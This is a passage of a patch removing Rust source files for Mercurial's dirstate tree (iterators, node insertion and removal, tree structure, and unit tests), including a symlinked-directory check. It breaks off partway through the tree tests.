- iter: T,
- ) -> Self {
- let mut tree = Self::new();
- for (path, entry) in iter {
- tree.insert(path, entry);
- }
- tree
- }
-}
-
-/// Iterator of all entries in the dirstate tree.
-///
-/// It has no particular ordering.
-pub struct Iter<'a> {
- to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>,
-}
-
-impl<'a> Iter<'a> {
- pub fn new(node: &'a Node) -> Iter<'a> {
- let mut to_visit = VecDeque::new();
- to_visit.push_back((Cow::Borrowed(&b""[..]), node));
- Self { to_visit }
- }
-}
-
-impl<'a> Iterator for Iter<'a> {
- type Item = (HgPathBuf, DirstateEntry);
-
- fn next(&mut self) -> Option<Self::Item> {
- while let Some((base_path, node)) = self.to_visit.pop_front() {
- match &node.kind {
- NodeKind::Directory(dir) => {
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- if let Some(file) = &dir.was_file {
- return Some((
- HgPathBuf::from_bytes(&base_path),
- file.entry,
- ));
- }
- }
- NodeKind::File(file) => {
- if let Some(dir) = &file.was_directory {
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- }
- return Some((
- HgPathBuf::from_bytes(&base_path),
- file.entry,
- ));
- }
- }
- }
- None
- }
-}
-
-impl<'a> FusedIterator for Iter<'a> {}
-
-/// Iterator of all entries in the dirstate tree, with a special filesystem
-/// handling for the directories containing said entries.
-///
-/// It checks every directory on-disk to see if it has become a symlink, to
-/// prevent a potential security issue.
-/// Using this information, it may dispatch `status` information early: it
-/// returns canonical paths along with `Shortcut`s, which are either a
-/// `DirstateEntry` or a `Dispatch`, if the fate of said path has already been
-/// determined.
-///
-/// Like `Iter`, it has no particular ordering.
-pub struct FsIter<'a> {
- root_dir: PathBuf,
- to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>,
- shortcuts: VecDeque<(HgPathBuf, StatusShortcut)>,
-}
-
-impl<'a> FsIter<'a> {
- pub fn new(node: &'a Node, root_dir: PathBuf) -> FsIter<'a> {
- let mut to_visit = VecDeque::new();
- to_visit.push_back((Cow::Borrowed(&b""[..]), node));
- Self {
- root_dir,
- to_visit,
- shortcuts: Default::default(),
- }
- }
-
- /// Mercurial tracks symlinks but *not* what they point to.
- /// If a directory is moved and symlinked:
- ///
- /// ```bash
- /// $ mkdir foo
- /// $ touch foo/a
- /// $ # commit...
- /// $ mv foo bar
- /// $ ln -s bar foo
- /// ```
- /// We need to dispatch the new symlink as `Unknown` and all the
- /// descendents of the directory it replace as `Deleted`.
- fn dispatch_symlinked_directory(
- &mut self,
- path: impl AsRef<HgPath>,
- node: &Node,
- ) {
- let path = path.as_ref();
- self.shortcuts.push_back((
- path.to_owned(),
- StatusShortcut::Dispatch(Dispatch::Unknown),
- ));
- for (file, _) in node.iter() {
- self.shortcuts.push_back((
- path.join(&file),
- StatusShortcut::Dispatch(Dispatch::Deleted),
- ));
- }
- }
-
- /// Returns `true` if the canonical `path` of a directory corresponds to a
- /// symlink on disk. It means it was moved and symlinked after the last
- /// dirstate update.
- ///
- /// # Special cases
- ///
- /// Returns `false` for the repository root.
- /// Returns `false` on io error, error handling is outside of the iterator.
- fn directory_became_symlink(&mut self, path: &HgPath) -> bool {
- if path.is_empty() {
- return false;
- }
- let filename_as_path = match hg_path_to_path_buf(&path) {
- Ok(p) => p,
- _ => return false,
- };
- let meta = self.root_dir.join(filename_as_path).symlink_metadata();
- match meta {
- Ok(ref m) if m.file_type().is_symlink() => true,
- _ => false,
- }
- }
-}
-
-/// Returned by `FsIter`, since the `Dispatch` of any given entry may already
-/// be determined during the iteration. This is necessary for performance
-/// reasons, since hierarchical information is needed to `Dispatch` an entire
-/// subtree efficiently.
-#[derive(Debug, Copy, Clone)]
-pub enum StatusShortcut {
- /// A entry in the dirstate for further inspection
- Entry(DirstateEntry),
- /// The result of the status of the corresponding file
- Dispatch(Dispatch),
-}
-
-impl<'a> Iterator for FsIter<'a> {
- type Item = (HgPathBuf, StatusShortcut);
-
- fn next(&mut self) -> Option<Self::Item> {
- // If any paths have already been `Dispatch`-ed, return them
- if let Some(res) = self.shortcuts.pop_front() {
- return Some(res);
- }
-
- while let Some((base_path, node)) = self.to_visit.pop_front() {
- match &node.kind {
- NodeKind::Directory(dir) => {
- let canonical_path = HgPath::new(&base_path);
- if self.directory_became_symlink(canonical_path) {
- // Potential security issue, don't do a normal
- // traversal, force the results.
- self.dispatch_symlinked_directory(
- canonical_path,
- &node,
- );
- continue;
- }
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- if let Some(file) = &dir.was_file {
- return Some((
- HgPathBuf::from_bytes(&base_path),
- StatusShortcut::Entry(file.entry),
- ));
- }
- }
- NodeKind::File(file) => {
- if let Some(dir) = &file.was_directory {
- add_children_to_visit(
- &mut self.to_visit,
- &base_path,
- &dir,
- );
- }
- return Some((
- HgPathBuf::from_bytes(&base_path),
- StatusShortcut::Entry(file.entry),
- ));
- }
- }
- }
-
- None
- }
-}
-
-impl<'a> FusedIterator for FsIter<'a> {}
-
-fn join_path<'a, 'b>(path: &'a [u8], other: &'b [u8]) -> Cow<'b, [u8]> {
- if path.is_empty() {
- other.into()
- } else {
- [path, &b"/"[..], other].concat().into()
- }
-}
-
-/// Adds all children of a given directory `dir` to the visit queue `to_visit`
-/// prefixed by a `base_path`.
-fn add_children_to_visit<'a>(
- to_visit: &mut VecDeque<(Cow<'a, [u8]>, &'a Node)>,
- base_path: &[u8],
- dir: &'a Directory,
-) {
- to_visit.extend(dir.children.iter().map(|(path, child)| {
- let full_path = join_path(&base_path, &path);
- (full_path, child)
- }));
-}
-
-#[cfg(test)]
-mod tests {
- use super::*;
- use crate::utils::hg_path::HgPath;
- use crate::{EntryState, FastHashMap};
- use std::collections::HashSet;
-
- #[test]
- fn test_iteration() {
- let mut tree = Tree::new();
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/bar"),
- DirstateEntry {
- state: EntryState::Merged,
- mode: 41,
- mtime: 42,
- size: 43,
- }
- ),
- None
- );
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo2"),
- DirstateEntry {
- state: EntryState::Merged,
- mode: 40,
- mtime: 41,
- size: 42,
- }
- ),
- None
- );
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/baz"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/bap/nested"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- assert_eq!(tree.len(), 4);
-
- let results: HashSet<_> =
- tree.iter().map(|(c, _)| c.to_owned()).collect();
- dbg!(&results);
- assert!(results.contains(HgPath::new(b"foo2")));
- assert!(results.contains(HgPath::new(b"foo/bar")));
- assert!(results.contains(HgPath::new(b"foo/baz")));
- assert!(results.contains(HgPath::new(b"foo/bap/nested")));
-
- let mut iter = tree.iter();
- assert!(iter.next().is_some());
- assert!(iter.next().is_some());
- assert!(iter.next().is_some());
- assert!(iter.next().is_some());
- assert_eq!(None, iter.next());
- assert_eq!(None, iter.next());
- drop(iter);
-
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"foo/bap/nested/a"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- let results: FastHashMap<_, _> = tree.iter().collect();
- assert!(results.contains_key(HgPath::new(b"foo2")));
- assert!(results.contains_key(HgPath::new(b"foo/bar")));
- assert!(results.contains_key(HgPath::new(b"foo/baz")));
- // Is a dir but `was_file`, so it's listed as a removed file
- assert!(results.contains_key(HgPath::new(b"foo/bap/nested")));
- assert!(results.contains_key(HgPath::new(b"foo/bap/nested/a")));
-
- // insert removed file (now directory) after nested file
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"a/a"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- // `insert` returns `None` for a directory
- assert_eq!(
- tree.insert(
- HgPathBuf::from_bytes(b"a"),
- DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- }
- ),
- None
- );
-
- let results: FastHashMap<_, _> = tree.iter().collect();
- assert!(results.contains_key(HgPath::new(b"a")));
- assert!(results.contains_key(HgPath::new(b"a/a")));
- }
-}
--- a/rust/hg-core/src/dirstate/dirstate_tree/node.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,398 +0,0 @@
-// node.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-use super::iter::Iter;
-use crate::utils::hg_path::HgPathBuf;
-use crate::{DirstateEntry, EntryState, FastHashMap};
-
-/// Represents a filesystem directory in the dirstate tree
-#[derive(Debug, Default, Clone, PartialEq)]
-pub struct Directory {
- /// Contains the old file information if it existed between changesets.
- /// Happens if a file `foo` is marked as removed, removed from the
- /// filesystem then a directory `foo` is created and at least one of its
- /// descendents is added to Mercurial.
- pub(super) was_file: Option<Box<File>>,
- pub(super) children: FastHashMap<Vec<u8>, Node>,
-}
-
-/// Represents a filesystem file (or symlink) in the dirstate tree
-#[derive(Debug, Clone, PartialEq)]
-pub struct File {
- /// Contains the old structure if it existed between changesets.
- /// Happens all descendents of `foo` marked as removed and removed from
- /// the filesystem, then a file `foo` is created and added to Mercurial.
- pub(super) was_directory: Option<Box<Directory>>,
- pub(super) entry: DirstateEntry,
-}
-
-#[derive(Debug, Clone, PartialEq)]
-pub enum NodeKind {
- Directory(Directory),
- File(File),
-}
-
-#[derive(Debug, Default, Clone, PartialEq)]
-pub struct Node {
- pub kind: NodeKind,
-}
-
-impl Default for NodeKind {
- fn default() -> Self {
- NodeKind::Directory(Default::default())
- }
-}
-
-impl Node {
- pub fn insert(
- &mut self,
- path: &[u8],
- new_entry: DirstateEntry,
- ) -> InsertResult {
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next().unwrap_or(b"");
- let tail = split.next().unwrap_or(b"");
-
- // Are we're modifying the current file ? Is the the end of the path ?
- let is_current_file = tail.is_empty() && head.is_empty();
-
- // Potentially Replace the current file with a directory if it's marked
- // as `Removed`
- if !is_current_file {
- if let NodeKind::File(file) = &mut self.kind {
- if file.entry.state == EntryState::Removed {
- self.kind = NodeKind::Directory(Directory {
- was_file: Some(Box::from(file.clone())),
- children: Default::default(),
- })
- }
- }
- }
- match &mut self.kind {
- NodeKind::Directory(directory) => {
- Node::insert_in_directory(directory, new_entry, head, tail)
- }
- NodeKind::File(file) => {
- if is_current_file {
- let new = Self {
- kind: NodeKind::File(File {
- entry: new_entry,
- ..file.clone()
- }),
- };
- InsertResult {
- did_insert: false,
- old_entry: Some(std::mem::replace(self, new)),
- }
- } else {
- match file.entry.state {
- EntryState::Removed => {
- unreachable!("Removed file turning into a directory was dealt with earlier")
- }
- _ => {
- Node::insert_in_file(
- file, new_entry, head, tail,
- )
- }
- }
- }
- }
- }
- }
-
- /// The current file still exists and is not marked as `Removed`.
- /// Insert the entry in its `was_directory`.
- fn insert_in_file(
- file: &mut File,
- new_entry: DirstateEntry,
- head: &[u8],
- tail: &[u8],
- ) -> InsertResult {
- if let Some(d) = &mut file.was_directory {
- Node::insert_in_directory(d, new_entry, head, tail)
- } else {
- let mut dir = Directory {
- was_file: None,
- children: FastHashMap::default(),
- };
- let res =
- Node::insert_in_directory(&mut dir, new_entry, head, tail);
- file.was_directory = Some(Box::new(dir));
- res
- }
- }
-
- /// Insert an entry in the subtree of `directory`
- fn insert_in_directory(
- directory: &mut Directory,
- new_entry: DirstateEntry,
- head: &[u8],
- tail: &[u8],
- ) -> InsertResult {
- let mut res = InsertResult::default();
-
- if let Some(node) = directory.children.get_mut(head) {
- // Node exists
- match &mut node.kind {
- NodeKind::Directory(subdir) => {
- if tail.is_empty() {
- let becomes_file = Self {
- kind: NodeKind::File(File {
- was_directory: Some(Box::from(subdir.clone())),
- entry: new_entry,
- }),
- };
- let old_entry = directory
- .children
- .insert(head.to_owned(), becomes_file);
- return InsertResult {
- did_insert: true,
- old_entry,
- };
- } else {
- res = node.insert(tail, new_entry);
- }
- }
- NodeKind::File(_) => {
- res = node.insert(tail, new_entry);
- }
- }
- } else if tail.is_empty() {
- // File does not already exist
- directory.children.insert(
- head.to_owned(),
- Self {
- kind: NodeKind::File(File {
- was_directory: None,
- entry: new_entry,
- }),
- },
- );
- res.did_insert = true;
- } else {
- // Directory does not already exist
- let mut nested = Self {
- kind: NodeKind::Directory(Directory {
- was_file: None,
- children: Default::default(),
- }),
- };
- res = nested.insert(tail, new_entry);
- directory.children.insert(head.to_owned(), nested);
- }
- res
- }
-
- /// Removes an entry from the tree, returns a `RemoveResult`.
- pub fn remove(&mut self, path: &[u8]) -> RemoveResult {
- let empty_result = RemoveResult::default();
- if path.is_empty() {
- return empty_result;
- }
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next();
- let tail = split.next().unwrap_or(b"");
-
- let head = match head {
- None => {
- return empty_result;
- }
- Some(h) => h,
- };
- if head == path {
- match &mut self.kind {
- NodeKind::Directory(d) => {
- return Node::remove_from_directory(head, d);
- }
- NodeKind::File(f) => {
- if let Some(d) = &mut f.was_directory {
- let RemoveResult { old_entry, .. } =
- Node::remove_from_directory(head, d);
- return RemoveResult {
- cleanup: false,
- old_entry,
- };
- }
- }
- }
- empty_result
- } else {
- // Look into the dirs
- match &mut self.kind {
- NodeKind::Directory(d) => {
- if let Some(child) = d.children.get_mut(head) {
- let mut res = child.remove(tail);
- if res.cleanup {
- d.children.remove(head);
- }
- res.cleanup =
- d.children.is_empty() && d.was_file.is_none();
- res
- } else {
- empty_result
- }
- }
- NodeKind::File(f) => {
- if let Some(d) = &mut f.was_directory {
- if let Some(child) = d.children.get_mut(head) {
- let RemoveResult { cleanup, old_entry } =
- child.remove(tail);
- if cleanup {
- d.children.remove(head);
- }
- if d.children.is_empty() && d.was_file.is_none() {
- f.was_directory = None;
- }
-
- return RemoveResult {
- cleanup: false,
- old_entry,
- };
- }
- }
- empty_result
- }
- }
- }
- }
-
- fn remove_from_directory(head: &[u8], d: &mut Directory) -> RemoveResult {
- if let Some(node) = d.children.get_mut(head) {
- return match &mut node.kind {
- NodeKind::Directory(d) => {
- if let Some(f) = &mut d.was_file {
- let entry = f.entry;
- d.was_file = None;
- RemoveResult {
- cleanup: false,
- old_entry: Some(entry),
- }
- } else {
- RemoveResult::default()
- }
- }
- NodeKind::File(f) => {
- let entry = f.entry;
- let mut cleanup = false;
- match &f.was_directory {
- None => {
- if d.children.len() == 1 {
- cleanup = true;
- }
- d.children.remove(head);
- }
- Some(dir) => {
- node.kind = NodeKind::Directory(*dir.clone());
- }
- }
-
- RemoveResult {
- cleanup,
- old_entry: Some(entry),
- }
- }
- };
- }
- RemoveResult::default()
- }
-
- pub fn get(&self, path: &[u8]) -> Option<&Node> {
- if path.is_empty() {
- return Some(&self);
- }
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next();
- let tail = split.next().unwrap_or(b"");
-
- let head = match head {
- None => {
- return Some(&self);
- }
- Some(h) => h,
- };
- match &self.kind {
- NodeKind::Directory(d) => {
- if let Some(child) = d.children.get(head) {
- return child.get(tail);
- }
- }
- NodeKind::File(f) => {
- if let Some(d) = &f.was_directory {
- if let Some(child) = d.children.get(head) {
- return child.get(tail);
- }
- }
- }
- }
-
- None
- }
-
- pub fn get_mut(&mut self, path: &[u8]) -> Option<&mut NodeKind> {
- if path.is_empty() {
- return Some(&mut self.kind);
- }
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next();
- let tail = split.next().unwrap_or(b"");
-
- let head = match head {
- None => {
- return Some(&mut self.kind);
- }
- Some(h) => h,
- };
- match &mut self.kind {
- NodeKind::Directory(d) => {
- if let Some(child) = d.children.get_mut(head) {
- return child.get_mut(tail);
- }
- }
- NodeKind::File(f) => {
- if let Some(d) = &mut f.was_directory {
- if let Some(child) = d.children.get_mut(head) {
- return child.get_mut(tail);
- }
- }
- }
- }
-
- None
- }
-
- pub fn iter(&self) -> Iter {
- Iter::new(self)
- }
-}
-
-/// Information returned to the caller of an `insert` operation for integrity.
-#[derive(Debug, Default)]
-pub struct InsertResult {
- /// Whether the insertion resulted in an actual insertion and not an
- /// update
- pub(super) did_insert: bool,
- /// The entry that was replaced, if it exists
- pub(super) old_entry: Option<Node>,
-}
-
-/// Information returned to the caller of a `remove` operation integrity.
-#[derive(Debug, Default)]
-pub struct RemoveResult {
- /// If the caller needs to remove the current node
- pub(super) cleanup: bool,
- /// The entry that was replaced, if it exists
- pub(super) old_entry: Option<DirstateEntry>,
-}
-
-impl<'a> IntoIterator for &'a Node {
- type Item = (HgPathBuf, DirstateEntry);
- type IntoIter = Iter<'a>;
-
- fn into_iter(self) -> Self::IntoIter {
- self.iter()
- }
-}
--- a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,682 +0,0 @@
-// tree.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-use super::iter::Iter;
-use super::node::{Directory, Node, NodeKind};
-use crate::dirstate::dirstate_tree::iter::FsIter;
-use crate::dirstate::dirstate_tree::node::{InsertResult, RemoveResult};
-use crate::utils::hg_path::{HgPath, HgPathBuf};
-use crate::DirstateEntry;
-use std::path::PathBuf;
-
-/// A specialized tree to represent the Mercurial dirstate.
-///
-/// # Advantages over a flat structure
-///
-/// The dirstate is inherently hierarchical, since it's a representation of the
-/// file structure of the project. The current dirstate format is flat, and
-/// while that affords us potentially great (unordered) iteration speeds, the
-/// need to retrieve a given path is great enough that you need some kind of
-/// hashmap or tree in a lot of cases anyway.
-///
-/// Going with a tree allows us to be smarter:
-/// - Skipping an ignored directory means we don't visit its entire subtree
-/// - Security auditing does not need to reconstruct paths backwards to check
-/// for symlinked directories, this can be done during the iteration in a
-/// very efficient fashion
-/// - We don't need to build the directory information in another struct,
-/// simplifying the code a lot, reducing the memory footprint and
-/// potentially going faster depending on the implementation.
-/// - We can use it to store a (platform-dependent) caching mechanism [1]
-/// - And probably other types of optimizations.
-///
-/// Only the first two items in this list are implemented as of this commit.
-///
-/// [1]: https://www.mercurial-scm.org/wiki/DirsCachePlan
-///
-///
-/// # Structure
-///
-/// It's a prefix (radix) tree with no fixed arity, with a granularity of a
-/// folder, allowing it to mimic a filesystem hierarchy:
-///
-/// ```text
-/// foo/bar
-/// foo/baz
-/// test
-/// ```
-/// Will be represented (simplified) by:
-///
-/// ```text
-/// Directory(root):
-/// - File("test")
-/// - Directory("foo"):
-/// - File("bar")
-/// - File("baz")
-/// ```
-///
-/// Moreover, it is special-cased for storing the dirstate and as such handles
-/// cases that a simple `HashMap` would handle, but while preserving the
-/// hierarchy.
-/// For example:
-///
-/// ```shell
-/// $ touch foo
-/// $ hg add foo
-/// $ hg commit -m "foo"
-/// $ hg remove foo
-/// $ rm foo
-/// $ mkdir foo
-/// $ touch foo/a
-/// $ hg add foo/a
-/// $ hg status
-/// R foo
-/// A foo/a
-/// ```
-/// To represent this in a tree, one needs to keep track of whether any given
-/// file was a directory and whether any given directory was a file at the last
-/// dirstate update. This tree stores that information, but only in the right
-/// circumstances by respecting the high-level rules that prevent nonsensical
-/// structures to exist:
-/// - a file can only be added as a child of another file if the latter is
-/// marked as `Removed`
-/// - a file cannot replace a folder unless all its descendents are removed
-///
-/// This second rule is not checked by the tree for performance reasons, and
-/// because high-level logic already prevents that state from happening.
-///
-/// # Ordering
-///
-/// It makes no guarantee of ordering for now.
-#[derive(Debug, Default, Clone, PartialEq)]
-pub struct Tree {
- pub root: Node,
- files_count: usize,
-}
-
-impl Tree {
- pub fn new() -> Self {
- Self {
- root: Node {
- kind: NodeKind::Directory(Directory {
- was_file: None,
- children: Default::default(),
- }),
- },
- files_count: 0,
- }
- }
-
- /// How many files (not directories) are stored in the tree, including ones
- /// marked as `Removed`.
- pub fn len(&self) -> usize {
- self.files_count
- }
-
- pub fn is_empty(&self) -> bool {
- self.len() == 0
- }
-
- /// Inserts a file in the tree and returns the previous entry if any.
- pub fn insert(
- &mut self,
- path: impl AsRef<HgPath>,
- kind: DirstateEntry,
- ) -> Option<DirstateEntry> {
- let old = self.insert_node(path, kind);
- match old?.kind {
- NodeKind::Directory(_) => None,
- NodeKind::File(f) => Some(f.entry),
- }
- }
-
- /// Low-level insertion method that returns the previous node (directories
- /// included).
- fn insert_node(
- &mut self,
- path: impl AsRef<HgPath>,
- kind: DirstateEntry,
- ) -> Option<Node> {
- let InsertResult {
- did_insert,
- old_entry,
- } = self.root.insert(path.as_ref().as_bytes(), kind);
- self.files_count += if did_insert { 1 } else { 0 };
- old_entry
- }
-
- /// Returns a reference to a node if it exists.
- pub fn get_node(&self, path: impl AsRef<HgPath>) -> Option<&Node> {
- self.root.get(path.as_ref().as_bytes())
- }
-
- /// Returns a reference to the entry corresponding to `path` if it exists.
- pub fn get(&self, path: impl AsRef<HgPath>) -> Option<&DirstateEntry> {
- if let Some(node) = self.get_node(&path) {
- return match &node.kind {
- NodeKind::Directory(d) => {
- d.was_file.as_ref().map(|f| &f.entry)
- }
- NodeKind::File(f) => Some(&f.entry),
- };
- }
- None
- }
-
- /// Returns `true` if an entry is found for the given `path`.
- pub fn contains_key(&self, path: impl AsRef<HgPath>) -> bool {
- self.get(path).is_some()
- }
-
- /// Returns a mutable reference to the entry corresponding to `path` if it
- /// exists.
- pub fn get_mut(
- &mut self,
- path: impl AsRef<HgPath>,
- ) -> Option<&mut DirstateEntry> {
- if let Some(kind) = self.root.get_mut(path.as_ref().as_bytes()) {
- return match kind {
- NodeKind::Directory(d) => {
- d.was_file.as_mut().map(|f| &mut f.entry)
- }
- NodeKind::File(f) => Some(&mut f.entry),
- };
- }
- None
- }
-
- /// Returns an iterator over the paths and corresponding entries in the
- /// tree.
- pub fn iter(&self) -> Iter {
- Iter::new(&self.root)
- }
-
- /// Returns an iterator of all entries in the tree, with a special
- /// filesystem handling for the directories containing said entries. See
- /// the documentation of `FsIter` for more.
- pub fn fs_iter(&self, root_dir: PathBuf) -> FsIter {
- FsIter::new(&self.root, root_dir)
- }
-
- /// Remove the entry at `path` and returns it, if it exists.
- pub fn remove(
- &mut self,
- path: impl AsRef<HgPath>,
- ) -> Option<DirstateEntry> {
- let RemoveResult { old_entry, .. } =
- self.root.remove(path.as_ref().as_bytes());
- self.files_count = self
- .files_count
- .checked_sub(if old_entry.is_some() { 1 } else { 0 })
- .expect("removed too many files");
- old_entry
- }
-}
-
-impl<P: AsRef<HgPath>> Extend<(P, DirstateEntry)> for Tree {
- fn extend<T: IntoIterator<Item = (P, DirstateEntry)>>(&mut self, iter: T) {
- for (path, entry) in iter {
- self.insert(path, entry);
- }
- }
-}
-
-impl<'a> IntoIterator for &'a Tree {
- type Item = (HgPathBuf, DirstateEntry);
- type IntoIter = Iter<'a>;
-
- fn into_iter(self) -> Self::IntoIter {
- self.iter()
- }
-}
-
-#[cfg(test)]
-mod tests {
- use super::*;
- use crate::dirstate::dirstate_tree::node::File;
- use crate::{EntryState, FastHashMap};
- use pretty_assertions::assert_eq;
-
- impl Node {
- /// Shortcut for getting children of a node in tests.
- fn children(&self) -> Option<&FastHashMap<Vec<u8>, Node>> {
- match &self.kind {
- NodeKind::Directory(d) => Some(&d.children),
- NodeKind::File(_) => None,
- }
- }
- }
-
- #[test]
- fn test_dirstate_tree() {
- let mut tree = Tree::new();
-
- assert_eq!(
- tree.insert_node(
- HgPath::new(b"we/p"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0
- }
- ),
- None
- );
- dbg!(&tree);
- assert!(tree.get_node(HgPath::new(b"we")).is_some());
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 41,
- mtime: 42,
- size: 43,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"foo/bar"), entry), None);
- assert_eq!(
- tree.get_node(HgPath::new(b"foo/bar")),
- Some(&Node {
- kind: NodeKind::File(File {
- was_directory: None,
- entry
- })
- })
- );
- // We didn't override the first entry we made
- assert!(tree.get_node(HgPath::new(b"we")).is_some(),);
- // Inserting the same key again
- assert_eq!(
- tree.insert_node(HgPath::new(b"foo/bar"), entry),
- Some(Node {
- kind: NodeKind::File(File {
- was_directory: None,
- entry
- }),
- })
- );
- // Inserting the two levels deep
- assert_eq!(tree.insert_node(HgPath::new(b"foo/bar/baz"), entry), None);
- // Getting a file "inside a file" should return `None`
- assert_eq!(tree.get_node(HgPath::new(b"foo/bar/baz/bap"),), None);
-
- assert_eq!(
- tree.insert_node(HgPath::new(b"wasdir/subfile"), entry),
- None,
- );
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- };
- assert!(tree
- .insert_node(HgPath::new(b"wasdir"), removed_entry)
- .is_some());
-
- assert_eq!(
- tree.get_node(HgPath::new(b"wasdir")),
- Some(&Node {
- kind: NodeKind::File(File {
- was_directory: Some(Box::new(Directory {
- was_file: None,
- children: [(
- b"subfile".to_vec(),
- Node {
- kind: NodeKind::File(File {
- was_directory: None,
- entry,
- })
- }
- )]
- .to_vec()
- .into_iter()
- .collect()
- })),
- entry: removed_entry
- })
- })
- );
-
- assert!(tree.get(HgPath::new(b"wasdir/subfile")).is_some())
- }
-
- #[test]
- fn test_insert_removed() {
- let mut tree = Tree::new();
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 10,
- mtime: 20,
- size: 30,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"foo"), entry), None);
- assert_eq!(
- tree.insert_node(HgPath::new(b"foo/a"), removed_entry),
- None
- );
- // The insert should not turn `foo` into a directory as `foo` is not
- // `Removed`.
- match tree.get_node(HgPath::new(b"foo")).unwrap().kind {
- NodeKind::Directory(_) => panic!("should be a file"),
- NodeKind::File(_) => {}
- }
-
- let mut tree = Tree::new();
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 10,
- mtime: 20,
- size: 30,
- };
- // The insert *should* turn `foo` into a directory as it is `Removed`.
- assert_eq!(tree.insert_node(HgPath::new(b"foo"), removed_entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"foo/a"), entry), None);
- match tree.get_node(HgPath::new(b"foo")).unwrap().kind {
- NodeKind::Directory(_) => {}
- NodeKind::File(_) => panic!("should be a directory"),
- }
- }
-
- #[test]
- fn test_get() {
- let mut tree = Tree::new();
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry));
- assert_eq!(tree.get(HgPath::new(b"a/b")), None);
- assert_eq!(tree.get(HgPath::new(b"a")), None);
- assert_eq!(tree.get(HgPath::new(b"a/b/c/d")), None);
- let entry2 = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 5,
- size: 1,
- };
- // was_directory
- assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2));
- assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry));
-
- let mut tree = Tree::new();
-
- // was_file
- assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2));
- }
-
- #[test]
- fn test_get_mut() {
- let mut tree = Tree::new();
- let mut entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry));
- assert_eq!(tree.get_mut(HgPath::new(b"a/b")), None);
- assert_eq!(tree.get_mut(HgPath::new(b"a")), None);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b/c/d")), None);
- let mut entry2 = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 5,
- size: 1,
- };
- // was_directory
- assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2));
- assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry));
-
- let mut tree = Tree::new();
-
- // was_file
- assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2));
- }
-
- #[test]
- fn test_remove() {
- let mut tree = Tree::new();
- assert_eq!(tree.files_count, 0);
